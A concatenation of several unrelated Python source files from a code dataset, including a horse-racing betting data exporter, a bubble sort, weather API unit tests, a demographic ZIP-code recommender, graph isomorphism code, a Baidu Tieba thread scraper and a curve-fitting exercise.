race_df[\"場名\"].apply(lambda x: mu.convert_basho(x))\n race_df.loc[:, \"レースNo\"] = race_df[\"RACE_KEY\"].str[6:8]\n race_df.loc[:, \"種別\"] = race_df[\"種別\"].apply(lambda x: mu.convert_shubetsu(x))\n race_df.loc[:, \"条件\"] = race_df[\"条件\"].apply(lambda x: self._convert_joken(x))\n race_df.loc[:, \"芝ダ\"] = race_df[\"芝ダ障害コード\"].apply(lambda x: mu.convert_shida(x))\n race_df.loc[:, \"コース名\"] = race_df.apply(lambda x: self._get_course_name(x), axis=1)\n race_df = pd.merge(race_df, self.ld.race_file_df[[\"RACE_KEY\", \"RACE_ID\"]], on=\"RACE_KEY\")\n race_df = race_df[[\"RACE_ID\", \"RACE_KEY\", \"場名\", \"レースNo\", \"距離\", \"芝ダ\", \"種別\", \"条件\", \"target_date\", \"コース名\"]].copy()\n race_df.to_csv(self.auto_bet_path + \"race.csv\", index=False, header=True)\n raceuma_df = self.ld.ext.get_raceuma_before_table_base()[[\"RACE_KEY\", \"UMABAN\", \"基準オッズ\", \"騎手名\", \"調教師名\", \"馬名\"]].copy()\n raceuma_df = pd.merge(raceuma_df, self.target_mark_df, on=[\"RACE_KEY\", \"UMABAN\"])\n raceuma_df.to_csv(self.auto_bet_path + \"raceuma.csv\", index=False, header=True)\n\n def _convert_joken(self, joken):\n if joken == 1: return \"A1\"\n if joken == 2: return \"A2\"\n if joken == 3: return \"A3\"\n if joken == 99: return \"OP\"\n if joken == 5: return \"500万下\"\n if joken == 10: return \"1000万下\"\n if joken == 16: return \"1600万下\"\n else: return \"\"\n\n def _get_course_name(self, sr):\n soto = \"外\" if sr[\"内外\"] == \"2\" else \"\"\n return sr[\"場名\"] + sr[\"芝ダ\"] + str(sr[\"距離\"]) +\"m\" + soto\n\nclass Sokuho(object):\n def __init__(self, target_date, test_flag):\n self.ext = Ext(target_date, target_date, test_flag)\n self.dict_path = mc.return_jra_path(test_flag)\n self.target_path = mc.TARGET_PATH\n self.auto_bet_path = self.target_path + 'AUTO_BET/'\n\n def export_pbi_real_data(self):\n jrdb = JrdbDownload()\n jrdb.procedure_download_sokuho()\n filelist = os.listdir(self.dict_path + \"jrdb_data/sokuho/\")\n for file in filelist:\n if file[0:3] == \"SED\":\n temp_df = self.ext.get_sed_sokuho_df(file)\n temp_df.to_csv(self.auto_bet_path + \"result.csv\", index=False, header=True)\n #elif file[0:3] == \"TYB\":\n # temp_df = self.ext.get_tyb_sokuho_df(file)\n # elif file[0:3] == \"SRB\":\n # temp_df = self.ext.get_srb_sokuho_df(file)\n elif file[0:3] == \"HJC\":\n temp_df = self.ext.get_hjc_sokuho_df(file)\n dict_haraimodoshi = self.ext.get_haraimodoshi_dict(temp_df)\n tansho_df = dict_haraimodoshi[\"tansho_df\"]\n tansho_df.loc[:, \"NENGAPPI\"] = \"20\" + file[3:9]\n tansho_df.loc[:, \"RACE_ID\"] = tansho_df.apply(lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], 
x[\"NENGAPPI\"]), axis=1)\n tansho_df.to_csv(self.auto_bet_path + \"tansho.csv\", index=False, header=True)\n fukusho_df = dict_haraimodoshi[\"fukusho_df\"]\n fukusho_df.loc[:, \"NENGAPPI\"] = \"20\" + file[3:9]\n fukusho_df.loc[:, \"RACE_ID\"] = fukusho_df.apply(lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"NENGAPPI\"]), axis=1)\n fukusho_df.to_csv(self.auto_bet_path + \"fukusho.csv\", index=False, header=True)\n umaren_df = dict_haraimodoshi[\"umaren_df\"]\n umaren_df.loc[:, \"NENGAPPI\"] = \"20\" + file[3:9]\n umaren_df.loc[:, \"RACE_ID\"] = umaren_df.apply(lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"NENGAPPI\"]), axis=1)\n umaren_df.loc[:, \"馬1\"] = umaren_df[\"UMABAN\"].apply(lambda x: int(x[0]))\n umaren_df.loc[:, \"馬2\"] = umaren_df[\"UMABAN\"].apply(lambda x: int(x[1]))\n umaren_df.to_csv(self.auto_bet_path + \"umaren.csv\", index=False, header=True)\n wide_df = dict_haraimodoshi[\"wide_df\"]\n wide_df.loc[:, \"NENGAPPI\"] = \"20\" + file[3:9]\n wide_df.loc[:, \"RACE_ID\"] = wide_df.apply(lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"NENGAPPI\"]), axis=1)\n wide_df.loc[:, \"馬1\"] = wide_df[\"UMABAN\"].apply(lambda x: int(x[0]))\n wide_df.loc[:, \"馬2\"] = wide_df[\"UMABAN\"].apply(lambda x: int(x[1]))\n wide_df.to_csv(self.auto_bet_path + \"wide.csv\", index=False, header=True)\n umatan_df = dict_haraimodoshi[\"umatan_df\"]\n umatan_df.loc[:, \"NENGAPPI\"] = \"20\" + file[3:9]\n umatan_df.loc[:, \"RACE_ID\"] = umatan_df.apply(lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"NENGAPPI\"]), axis=1)\n umatan_df.loc[:, \"馬1\"] = umatan_df[\"UMABAN\"].apply(lambda x: int(x[0]))\n umatan_df.loc[:, \"馬2\"] = umatan_df[\"UMABAN\"].apply(lambda x: int(x[1]))\n umatan_df.to_csv(self.auto_bet_path + \"umatan.csv\", index=False, header=True)\n sanrenpuku_df = dict_haraimodoshi[\"sanrenpuku_df\"]\n sanrenpuku_df.loc[:, \"NENGAPPI\"] = \"20\" + file[3:9]\n sanrenpuku_df.loc[:, \"RACE_ID\"] = sanrenpuku_df.apply(lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"NENGAPPI\"]), axis=1)\n sanrenpuku_df.loc[:, \"馬1\"] = sanrenpuku_df[\"UMABAN\"].apply(lambda x: int(x[0]))\n sanrenpuku_df.loc[:, \"馬2\"] = sanrenpuku_df[\"UMABAN\"].apply(lambda x: int(x[1]))\n sanrenpuku_df.loc[:, \"馬3\"] = sanrenpuku_df[\"UMABAN\"].apply(lambda x: int(x[2]))\n sanrenpuku_df.to_csv(self.auto_bet_path + \"sanrenpuku.csv\", index=False, header=True)\n else:\n continue\n\n\nif __name__ == \"__main__\":\n args = sys.argv\n print(args)\n print(\"mode:\" + args[1]) # test or init or prod\n mock_flag = False\n test_flag = False\n mode = args[1]\n dict_path = mc.return_jra_path(test_flag)\n version_str = \"dummy\" #dict_folderを取得するのに使用\n pd.set_option('display.max_columns', 3000)\n pd.set_option('display.max_rows', 3000)\n if mode == \"test\":\n print(\"Test mode\")\n start_date = '2020/01/01'\n # end_date = '2020/05/31'\n end_date = (dt.now() + timedelta(days=1)).strftime('%Y/%m/%d')\n term_start_date = '20200501'\n term_end_date = '20200531'\n elif mode == \"init\":\n start_date = '2019/01/01'\n end_date = (dt.now() + timedelta(days=1)).strftime('%Y/%m/%d')\n term_start_date = '20190101'\n term_end_date = (dt.now() + timedelta(days=1)).strftime('%Y%m%d')\n elif mode == \"prod\":\n start_date = (dt.now() + timedelta(days=-90)).strftime('%Y/%m/%d')\n end_date = (dt.now() + timedelta(days=1)).strftime('%Y/%m/%d')\n term_start_date = (dt.now() + timedelta(days=-9)).strftime('%Y%m%d')\n term_end_date = (dt.now() + timedelta(days=1)).strftime('%Y%m%d')\n elif mode == \"sokuho\":\n start_date = (dt.now() + 
timedelta(days=-90)).strftime('%Y/%m/%d')\n end_date = (dt.now() + timedelta(days=1)).strftime('%Y/%m/%d')\n term_start_date = (dt.now()).strftime('%Y%m%d')\n term_end_date = (dt.now()).strftime('%Y%m%d')\n sokuho = Sokuho(end_date, test_flag)\n sokuho.export_pbi_real_data()\n\n print(\"MODE:\" + str(args[1]) + \" update_start_date:\" + term_start_date + \" update_end_date:\" + term_end_date)\n\n av = AutoVote(start_date, end_date, term_start_date, term_end_date, test_flag)\n av.export_bet_csv()\n av.export_pbi_data()\n","sub_path":"scripts/jra_auto_vote.py","file_name":"jra_auto_vote.py","file_ext":"py","file_size_in_byte":44427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"39945108","text":"#6, 3, 8, 2, 9, 1 这么一组数据,每次冒泡把最大的放到最后去,几轮之后就是按照从小到大排序了\n#参考onedrive里的FireShot Capture 2 - php四排序-冒泡排序\n\narr = [6, 3, 8, 2, 9, 1]\nnum = len(arr)\n\nfor i in range(num - 1):#控制轮数\n\tl = i + 1\n\tneedChange = 0\n\tfor j in range(num - l):#控制每轮的比较次数\n\t\tprint(l, j)#l代表第几轮,j从0开始,用j与j+1进行比较\n\t\tif(arr[j + 1] < arr[j]):\n\t\t\ttmp = arr[j]\n\t\t\tarr[j] = arr[j + 1]\n\t\t\tarr[j + 1] = tmp\n\t\t\tneedChange = 1\n\tif not needChange:\n\t\tbreak\n\nprint(arr)\n\t\t","sub_path":"sort_bubble.py","file_name":"sort_bubble.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"283730380","text":"import requests\r\nimport unittest\r\n\r\nclass TestWeather(unittest.TestCase):\r\n '''天气接口'''\r\n def test_01(self):\r\n '''成功案例:time=2019-04-05, city=上海'''\r\n url = \"http://47.104.190.48:8000/weather_json/\"\r\n par = {\r\n \"time\": \"2019-04-05\",\r\n \"city\": \"上海\"\r\n }\r\n r = requests.get(url, params=par)\r\n print(r.text) # 确认是不是json\r\n reason = r.json()['reason']\r\n print(reason) # 实际结果\r\n exp = \"success\" # 期望结果\r\n # assert reason==exp\r\n self.assertTrue(reason==exp) # 断言\r\n\r\n def test_02(self):\r\n '''失败案例:time=2019-04-, city=上海'''\r\n url = \"http://47.104.190.48:8000/weather_json/\"\r\n par = {\r\n \"time\": \"2019-04-\",\r\n \"city\": \"上海\"\r\n }\r\n r = requests.get(url, params=par)\r\n print(r.text) # 确认是不是json\r\n reason = r.json()['reason']\r\n print(reason) # 实际结果\r\n exp = \"时间格式不对\" # 期望结果\r\n self.assertTrue(exp in reason)\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n\r\n\r\n","sub_path":"APITestProject/cases/model2/test_weather.py","file_name":"test_weather.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"477456532","text":"__author__ = 'zelengzhuang'\n\nfrom rcmOnFacts.RcmSystem.tools import cos\nfrom rcmOnFacts.models import cityData\n\nclass algorithm:\n @staticmethod\n def rcmdtion (input, sessionVal):\n gender = int (input ['gender'])\n marriage = int (input ['marriage'])\n race = int (input ['race'])\n sexo = int (input ['sexorient'])\n rentbuy = int (input ['rentbuy'])\n education = int (input ['education'])\n subChoice = int (input ['submitType'])\n\n if gender == 1:\n target = {\n 'malePercentage': 0,\n 'femalePercentage': 1\n }\n elif gender == 2:\n target = {\n 'malePercentage': 0.5,\n 'femalePercentage': 0.5\n }\n else:\n target = {\n 'malePercentage': 1,\n 'femalePercentage': 0\n }\n if marriage == 1:\n target ['neverMarried'] = 1\n target ['nowMarried'] = 0\n target ['seperated'] = 0\n target ['divorced'] = 0\n target ['widowed'] = 0\n elif marriage == 2:\n target ['neverMarried'] = 0\n target ['nowMarried'] 
= 1\n target ['seperated'] = 0\n target ['divorced'] = 0\n target ['widowed'] = 0\n elif marriage == 3:\n target ['neverMarried'] = 0\n target ['nowMarried'] = 0\n target ['seperated'] = 1\n target ['divorced'] = 0\n target ['widowed'] = 0\n elif marriage == 4:\n target ['neverMarried'] = 0\n target ['nowMarried'] = 0\n target ['seperated'] = 0\n target ['divorced'] = 1\n target ['widowed'] = 0\n elif marriage == 5:\n target ['neverMarried'] = 0\n target ['nowMarried'] = 0\n target ['seperated'] = 0\n target ['divorced'] = 0\n target ['widowed'] = 1\n elif marriage == 6:\n target ['neverMarried'] = 0.2\n target ['nowMarried'] = 0.2\n target ['seperated'] = 0.2\n target ['divorced'] = 0.2\n target ['widowed'] = 0.2\n\n if race == 1:\n target ['white'] = 1\n target ['black'] = 0\n target ['americanIndian'] = 0\n target ['asian'] = 0\n target ['hispanic'] = 0\n target ['hawaiian'] = 0\n target ['twoOrMore'] = 0\n target ['otherRace'] = 0\n elif race == 2:\n target ['white'] = 0\n target ['black'] = 1\n target ['americanIndian'] = 0\n target ['asian'] = 0\n target ['hispanic'] = 0\n target ['hawaiian'] = 0\n target ['twoOrMore'] = 0\n target ['otherRace'] = 0\n elif race == 3:\n target ['white'] = 0\n target ['black'] = 0\n target ['americanIndian'] = 1\n target ['asian'] = 0\n target ['hispanic'] = 0\n target ['hawaiian'] = 0\n target ['twoOrMore'] = 0\n target ['otherRace'] = 0\n elif race == 4:\n target ['white'] = 0\n target ['black'] = 0\n target ['americanIndian'] = 0\n target ['asian'] = 1\n target ['hispanic'] = 0\n target ['hawaiian'] = 0\n target ['twoOrMore'] = 0\n target ['otherRace'] = 0\n elif race == 5:\n target ['white'] = 0\n target ['black'] = 0\n target ['americanIndian'] = 0\n target ['asian'] = 0\n target ['hispanic'] = 1\n target ['hawaiian'] = 0\n target ['twoOrMore'] = 0\n target ['otherRace'] = 0\n elif race == 6:\n target ['white'] = 0\n target ['black'] = 0\n target ['americanIndian'] = 0\n target ['asian'] = 0\n target ['hispanic'] = 0\n target ['hawaiian'] = 1\n target ['twoOrMore'] = 0\n target ['otherRace'] = 0\n elif race == 7:\n target ['white'] = 0\n target ['black'] = 0\n target ['americanIndian'] = 0\n target ['asian'] = 0\n target ['hispanic'] = 0\n target ['hawaiian'] = 0\n target ['twoOrMore'] = 1\n target ['otherRace'] = 0\n elif race == 8:\n target ['white'] = 0\n target ['black'] = 0\n target ['americanIndian'] = 0\n target ['asian'] = 0\n target ['hispanic'] = 0\n target ['hawaiian'] = 0\n target ['twoOrMore'] = 0\n target ['otherRace'] = 1\n\n if sexo == 1:\n target ['gay'] = 1\n target ['lesbian'] = 0\n target ['malePercentage'] = 1\n target ['femalePercentage'] = 0\n elif sexo == 2:\n target ['gay'] = 0\n target ['lesbian'] = 1\n target ['malePercentage'] = 0\n target ['femalePercentage'] = 1\n elif sexo == 3:\n target ['gay'] = 0\n target ['lesbian'] = 0\n elif sexo == 4:\n target ['gay'] = 0.5\n target ['lesbian'] = 0.5\n\n if rentbuy == 1:\n target ['rent'] = 1\n target ['buy'] = 0\n elif rentbuy == 2:\n target ['rent'] = 0\n target ['buy'] = 1\n elif rentbuy == 3:\n target ['rent'] = 0.5\n target ['buy'] = 0.5\n\n\n if education == 1:\n target ['noEducation'] = 1\n target ['highSchool'] = 0\n target ['bachelor'] = 0\n target ['master'] = 0\n elif education == 2:\n target ['noEducation'] = 0\n target ['highSchool'] = 1\n target ['bachelor'] = 0\n target ['master'] = 0\n elif education == 3:\n target ['noEducation'] = 0\n target ['highSchool'] = 0\n target ['bachelor'] = 1\n target ['master'] = 0\n elif education == 4:\n target ['noEducation'] = 
0\n target ['highSchool'] = 0\n target ['bachelor'] = 0\n target ['master'] = 1\n elif education == 5:\n target ['noEducation'] = 0.5\n target ['highSchool'] = 0.5\n target ['bachelor'] = 0.5\n target ['master'] = 0.5\n\n assert (len (target.keys()) == 23)\n res = []\n resSimilarityOnly = []\n for i in cityData.objects.all():\n simlarity = float(\"{0:3.03f}\".format(cos(i, target, target.keys())))\n simlaritySecondRound = 0\n if subChoice == 1:\n for j in sessionVal:\n if j ['zip'] == i.zipCode:\n simlaritySecondRound = j ['simlarity']\n break\n tmp = {\n 'zipThing': i,\n 'simlarity': simlarity\n }\n if subChoice == 1:\n tmp ['simlaritySecondRound'] = simlaritySecondRound\n tmpNew = {\n 'zip': i.zipCode,\n 'simlarity': simlarity\n }\n res.append(tmp)\n resSimilarityOnly.append(tmpNew)\n if subChoice == 2:\n res.sort(key=lambda zipObj: zipObj [\"simlarity\"], reverse=True)\n else:\n res.sort(key=lambda zipObj: zipObj [\"simlarity\"] + zipObj [\"simlaritySecondRound\"], reverse=True)\n resSimilarityOnly.sort(key=lambda zipObj: zipObj [\"simlarity\"], reverse=True)\n ret = (res, resSimilarityOnly)\n return ret\n","sub_path":"Website/community/rcmOnFacts/RcmSystem/rcmAlgorithm.py","file_name":"rcmAlgorithm.py","file_ext":"py","file_size_in_byte":7577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"364482396","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom random import random, randint\nimport cv2\nimport os\n\nLOWER_IND = 60\nUPPER_IND = 135\nSTEER_BIAS = 0.23\nTRANS = 100\n\ndef remove_small_steering(data,thresh=0.05,drop_ratio=0.8):\n \"\"\" remove angles that are smaller than thresh randomly, drop_ratio determines fraction\n of small angles to drop\n \"\"\"\n index = data[abs(data['steer']) highest_label:\n highest_label = degree\n\n return color_refine(graph, highest_label)\n\ndef fast_colour_graph(graph):\n buckets = {}\n\n for n in graph.get_nodes():\n degree = n.get_degree()\n if degree not in buckets:\n buckets[degree] = set()\n buckets[degree].add(n)\n\n return fast_colour_refine(graph, list(buckets.values()))\n\ndef get_color_set(graph):\n colors = {}\n\n for n in graph.get_nodes():\n label = n.get_label()\n if label in colors:\n colors[label] += 1\n else:\n colors[label] = 1\n\n return colors\n\ndef fast_count_isomorphisms(graph1, graph2):\n graph1 = graph1.deep_copy()\n graph2 = graph2.deep_copy()\n graph = graph1 + graph2\n classes = fast_colour_graph(graph)\n\n def count_recursive(classes):\n bijection = True\n branch = None\n branch_cls = None\n\n for cls in classes:\n left = set()\n right = set()\n\n for node in cls:\n if node in graph1.get_nodes():\n left.add(node)\n else:\n right.add(node)\n\n if len(left) != len(right):\n return 0\n\n if len(left) != 1:\n bijection = False\n branch = left, right\n branch_cls = cls\n\n if bijection:\n return 1\n\n left, right = branch\n x = left.pop()\n branch_cls.remove(x)\n total = 0\n\n for y in right:\n branch_cls.remove(y)\n\n new_class = {x, y}\n total += count_recursive(fast_colour_refine(graph, [ cls.copy() for cls in classes ] + [new_class], stack=[new_class]))\n\n branch_cls.add(y)\n\n branch_cls.add(x)\n return total\n return count_recursive(classes)\n\ndef fast_check_isomorphism(graph1, graph2):\n graph1 = graph1.deep_copy()\n graph2 = graph2.deep_copy()\n graph = graph1 + graph2\n classes = fast_colour_graph(graph)\n\n def check_recursive(classes):\n bijection = True\n branch = None\n branch_cls = None\n\n for cls in classes:\n left = set()\n right = 
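set()\n\n            # partition the colour class between graph1's and graph2's nodes so the two sides can be compared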
\n            for node in cls:
\n                if node in graph1.get_nodes():
\n                    left.add(node)
\n                else:
\n                    right.add(node)
\n\n            if len(left) != len(right):
\n                return 0
\n\n            if len(left) != 1:
\n                bijection = False
\n                branch = left, right
\n                branch_cls = cls
\n\n        if bijection:
\n            return 1
\n\n        left, right = branch
\n        x = left.pop()
\n        branch_cls.remove(x)
\n\n        for y in right:
\n            branch_cls.remove(y)
\n\n            new_class = {x, y}
\n            if check_recursive(fast_colour_refine(graph, [ cls.copy() for cls in classes ] + [new_class], stack=[new_class])):
\n                return True
\n\n            branch_cls.add(y)
\n\n        branch_cls.add(x)
\n        return False
\n\n    return check_recursive(classes)
\n\ndef count_isomorphisms(graph1, graph2):
\n    graph1 = graph1.deep_copy()
\n    graph2 = graph2.deep_copy()
\n    graph = graph1 + graph2
\n    highest_label = color_graph(graph)
\n\n    def count_recursive(graph1, graph2, highest_label):
\n        colors1 = get_color_set(graph1)
\n        colors2 = get_color_set(graph2)
\n\n        if list(sorted(colors1.keys())) != list(sorted(colors2.keys())):
\n            return 0
\n\n        for k, v in colors1.items():
\n            if v != colors2[k]:
\n                return 0 # Unbalanced
\n\n        if all(map(lambda count: count == 1, colors1.values())):
\n            return 1 # Already a bijection
\n\n        # Not a bijection, so find a color to branch on
\n        for color, count in colors1.items():
\n            if count > 1:
\n                break
\n\n        total = 0 # Total number of isomorphisms
\n\n        # Find an arbitrary node that has the selected color in the left graph
\n        for x in graph1.get_nodes():
\n            if x.get_label() == color:
\n                break
\n\n        # Give the node a new color
\n        highest_label += 1
\n        new_label = highest_label
\n        x.set_label(new_label)
\n\n        # Iterate over all nodes in the right graph and change one of the nodes (i.e. y) to have the same color as x
\n        # This spans all isomorphisms, since we select a specific mapping for x on y, from all possible mappings.
\n        for y in graph2.get_nodes():
\n            if y.get_label() != color:
\n                continue
\n\n            y.set_label(new_label)
\n\n            cloned_graph1 = graph1.deep_copy()
\n            cloned_graph2 = graph2.deep_copy()
\n\n            cloned_graph = cloned_graph1 + cloned_graph2
\n\n            # Refine the disjoint union of the graphs again, since we added a new color
\n            new_highest_label = color_refine(cloned_graph, highest_label)
\n\n            total += count_recursive(cloned_graph1, cloned_graph2, new_highest_label)
\n\n            y.set_label(color)
\n\n        x.set_label(color)
\n\n        return total
\n\n    return count_recursive(graph1, graph2, highest_label)
\n\n\ndef get_labels(n):
\n    neighbours_labels = []
\n\n    for neighbour in n.get_neighbours():
\n        neighbours_labels.append(neighbour.get_label())
\n\n    return tuple(sorted(neighbours_labels))
\n\n\ndef color_refine(graph, highest_label):
\n    done = False
\n\n    while not done:
\n        done = True
\n\n        to_change = []
\n        labels = {}
\n        assigned = set()
\n\n        for n in graph.get_nodes():
\n            neighbours_labels = (n.get_label(), get_labels(n))
\n\n            if neighbours_labels not in labels:
\n                if n.get_label() in assigned:
\n                    highest_label += 1
\n                    labels[neighbours_labels] = highest_label
\n                    done = False
\n                else:
\n                    labels[neighbours_labels] = n.get_label()
\n                    assigned.add(n.get_label())
\n\n            to_change.append((n, labels[neighbours_labels]))
\n\n        for node, label in to_change:
\n            node.set_label(label)
\n\n    return highest_label
\n\ndef fast_colour_refine(graph, current_classes, stack=None):
\n    # Keeps track of which classes still have to be compared against all the other groups
\n    if stack is None:
\n        stack = [ cls for cls in current_classes ]
\n    # Colour
\n    while stack:
\n        refining_set = stack.pop()
\n        to_add = []
\n        for cls in current_classes:
\n            buckets = {}
\n            # Split the class into buckets by connection count
\n            for node in cls:
\n                no_conn = 0
\n                for neighbour in node.get_neighbours():
\n                    if neighbour in refining_set:
\n                        no_conn += 1
\n                if no_conn not in buckets:
\n                    buckets[no_conn] = set()
\n                buckets[no_conn].add(node)
\n            max_bucket_key = max(buckets.keys(), key=lambda k: len(buckets[k]))
\n            bucket = buckets.pop(max_bucket_key)
\n            cls.clear()
\n            cls |= bucket
\n            # add all the other buckets as classes (they are already sets, so they already form the colour class)
\n            for bucket in buckets.values():
\n                stack.append(bucket)
\n                to_add.append(bucket)
\n        current_classes += to_add
\n    return current_classes
\n\n\n    #Pick one class and refine its colour further
\n    #do something recursive here
\n\n\ndef maximum_clique(graph):
\n    def clique(U, size, cur_max):
\n        if len(U) == 0:
\n            return max(size, cur_max)
\n\n        while len(U) > 0:
\n            if size + len(U) <= cur_max:
\n                return cur_max
\n\n            v = min(U, key=lambda u: u.get_label())
\n\n            if size + c[v.get_label()] <= cur_max:
\n                return cur_max
\n\n            U.remove(v)
\n\n            result = clique({ neighbour for neighbour in v.get_neighbours() if neighbour in U }, size + 1, cur_max)
\n            if result > cur_max:
\n                return result
\n\n        return cur_max
\n\n    S = set()
\n    c = {}
\n    nodes = list(graph.get_nodes())
\n\n    for i, node in enumerate(nodes):
\n        node.set_label(i)
\n\n    for i, node in reversed(list(enumerate(nodes))):
\n        S.add(node)
\n        cur_max = clique({ neighbour for neighbour in node.get_neighbours() if neighbour in S }, 1, c[i+1] if (i+1) in c else 0)
\n        c[i] = cur_max
\n\n    return c[0]
\n\n# if __name__ == \"__main__\":
\n#     path = sys.argv[1]
\n#     f = open(path)
\n#     graph = basic.Graph.read_from_file(f)
\n#
\n#     print(maximum_clique(graph))
\n\nif __name__ == \"__main__\":
\n    path = sys.argv[1]
\n    f = open(path)
\n    graphs = basic.Graph.read_from_list_file(f)
\n    print(\"=== {} ===\".format(path), file=sys.stderr)
\n    if len(sys.argv) > 2:
\n        isomorphism_sets = []
\n\n        for i, g in enumerate(graphs):
\n            for isomorphic_graphs in isomorphism_sets:
\n                print(\"(Checking {} and {})\".format(i, isomorphic_graphs[0]), file=sys.stderr)
\n                if fast_check_isomorphism(g, graphs[isomorphic_graphs[0]]):
\n                    isomorphic_graphs.append(i)
\n                    break
\n            else:
\n                isomorphism_sets.append([i])
\n\n        print(\"Sets of isomorphic graphs:\")
\n        for isomorphic_graphs in isomorphism_sets:
\n            print(\"{}\".format(isomorphic_graphs))
\n    else:
\n        isomorphism_sets = []
\n\n        for i, g in enumerate(graphs):
\n            for count, isomorphic_graphs in isomorphism_sets:
\n                print(\"(Checking {} and {})\".format(i, isomorphic_graphs[0]), file=sys.stderr)
\n                if fast_check_isomorphism(g, graphs[isomorphic_graphs[0]]):
\n                    isomorphic_graphs.append(i)
\n                    break
\n            else:
\n                print(\"(Counting {} and {})\".format(i, i), file=sys.stderr)
\n                count = fast_count_isomorphisms(g, g)
\n                isomorphism_sets.append((count, [i]))
\n\n        print(\"Sets of isomorphic graphs:\\tNumber of automorphisms:\")
\n        for count, isomorphic_graphs in isomorphism_sets:
\n            print(\"{}\\t\\t\\t\\t\\t\\t{}\".format(isomorphic_graphs, count))
\n","sub_path":"color_refinement.py","file_name":"color_refinement.py","file_ext":"py","file_size_in_byte":10190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"515178877","text":"import requests\nimport re
\n\n'''\n# @Date    : 2018-01-17 16:33:06\n# @Author  : zlz (codecool97@gmail.com)\n# @Link    : https://www.codedraw.cn\n'''
\n\nclass BDTB:
\n\n    def __init__(self):
\n        self.baseURL = \"https://tieba.baidu.com/p/\"
\n        self.seeLZ = '?see_lz='
\n        self.file = None
\n        self.default_title = \"Untitled\"
\n        # index of the page currently being read
\n        self.page_index = 1
\n        # running count of the floors written out
\n        self.content_num = 1
\n\n    # fetch one page of the thread
\n    def get_page(self, question_num, see_lz=1, pn=1):
\n        try:\n
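            # the thread URL is base + thread id + the see_lz (author-only) flag + a page number,
\n            # e.g. https://tieba.baidu.com/p/3138733512?see_lz=1&pn=1
\n            url = self.baseURL + str(question_num) + self.seeLZ + str(see_lz) + '&pn=' + str(pn)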
\n            r = requests.get(url, timeout=3)
\n            return r.text
\n        except Exception as e:
\n            return e
\n\n    # get the thread title
\n    def get_Title(self, html):
\n        pattern = re.compile('''<h3 class=\"core_title_txt.*?>(.*?)</h3>''', re.S)
\n        # re.S lets '.' match any character, including newlines
\n        result = re.search(pattern, html)
\n        if result:
\n            # print(result.group(1)) # debug output
\n            return result.group(1)
\n        else:
\n            return None
\n\n    # get the total number of pages in the thread
\n    def getPageNum(self, html):
\n        pattern = re.compile('<li class=\"l_reply_num.*?>.*?<span class=\"red\">(.*?)</span>', re.S)
\n        result = re.search(pattern, html)
\n        if result:
\n            # print(result.group(1)) # debug output
\n            # group() extracts the substring captured by the (.*?) group
\n            return int(result.group(1).strip())
\n        else:
\n            return None
\n\n    # get the content of every floor (reply), given the page HTML
\n    def getDetail(self, html):
\n        pattern = re.compile('<div id=\"post_content_.*?>(.*?)</div>', re.S)
\n        details = re.findall(pattern, html)
\n        if details:
\n            str_contents = self.replace(details)
\n            return str_contents
\n        return None
\n\n    # strip useless markup from the matches
\n    def replace(self, result):
\n        str_contents = []
\n        for detail in result:
\n            item = re.sub('''<img.*?>|<br>''', \"\\n\", detail) # strip image tags, turn <br> into newlines
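\n            # NOTE: Tieba's markup changes over time; the tag patterns in this class assume the
\n            # classic page layout (core_title_txt title, l_reply_num page counter, post_content_ floors)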
\n            item = re.sub('''<a.*?>|</a>| {4,7}''', \"\", item) # strip link tags and stray indent runs
\n            str_contents.append(item.strip())
\n        # print(str_contents)
\n        return str_contents
\n\n    def open_file(self, title):
\n        if title:
\n            self.file = open(title + \".txt\", \"w+\", encoding=\"utf-8\")
\n        else:
\n            self.file = open(self.default_title + \".txt\", \"w+\", encoding=\"utf-8\")
\n\n    def write_file(self, str_contents):
\n        for str_content in str_contents:
\n            self.file.write(\"Floor: \" + str(self.content_num) + \"-------------------------------\\n\")
\n            self.file.write(str_content + \"\\n\")
\n            self.content_num += 1
\n\n    def start(self, question_num, see_lz=1):
\n        html = self.get_page(question_num, see_lz, self.page_index)
\n        title = self.get_Title(html)
\n        page_num = self.getPageNum(html)
\n        self.open_file(title)
\n        # fetch every page and write it to the file
\n        for i in range(page_num):
\n            str_contents = self.getDetail(html)
\n            self.write_file(str_contents)
\n            self.page_index += 1
\n            html = self.get_page(question_num, see_lz, self.page_index)
\n\n\nif __name__ == \"__main__\":
\n    # baseUrl = 'http://tieba.baidu.com/p/3138733512'
\n    # bdtb = BDTB(baseUrl, 1)
\n    # bdtb.getDetail(bdtb.get_page(1))
\n    # # bdtb.getPageNum()
\n    bdtb = BDTB()
\n    bdtb.start(input('Enter the thread id to fetch: '), input('Author-only posts? 1 for yes, 0 for no: '))","sub_path":"爬虫实战/BDTB/bdtb.py","file_name":"bdtb.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"348117561","text":"# Pablo Wiedemann 313510\n# Simon Wiedemann 324020
\n\n# SERIES 1\n# EXERCISE 1
\n\nimport numpy as np
\nimport matplotlib.pyplot as plt
\nfrom matplotlib.legend_handler import HandlerLine2D
\n\n# a) -----------------------------------------------------------------
\ndata = np.loadtxt(\"DispersionCurve.txt\", skiprows = 1) 
\nk= data[:,0]
\nu= data[:,1]
\n\n# b) -----------------------------------------------------------------
\n\ndef CoeffPol(N,k,u): # returns the coefficients of the \"best fit function\" with polynomial basis 
\n    \n    # to solve: A_T*A*alpha=A_T*u
\n    \n    m=len(k) 
\n    A = [[pow(k[i],j) for j in range(N)] for i in range(m)] # Matrix A
\n    A_T= np.transpose(A)
\n    \n    QR= np.linalg.qr(A) # QR-factorisation of A
